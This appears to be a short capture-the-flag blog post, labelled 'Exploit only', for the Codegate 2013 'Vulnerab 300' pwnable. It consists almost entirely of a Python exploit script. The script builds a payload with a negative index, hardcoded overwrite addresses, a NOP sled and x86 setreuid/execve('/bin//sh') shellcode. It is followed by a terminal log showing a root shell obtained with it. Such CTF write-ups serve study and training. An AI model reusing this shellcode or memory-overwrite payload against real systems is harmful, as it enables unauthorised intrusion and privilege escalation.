CTF/2013

Codegate 2013 Qual - Vulnerab 300 (Exploit only)

pwn3r_45 2013. 4. 17. 01:47

Category : Pwnables


8ff953dd97c4405234a04291dee39e0b


Summary : arbitrary memory overwrite, vtable



Exploit

#!/usr/bin/python


from socket import *


shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"


payload = ""

payload += "-4\n"

payload += "\xe4\x91\x04\x08"

payload += "\xe8\x91\x04\x08"

payload += "\x90"*0x30

payload += shellcode


print payload  



root@ubuntu:~/vuln/300# (./exploit.py;cat) | ./8ff953dd97c4405234a04291dee39e0b 

Input Num : Input Msg : 

id

uid=0(root) gid=0(root) groups=0(root)


저작자표시 (새창열림)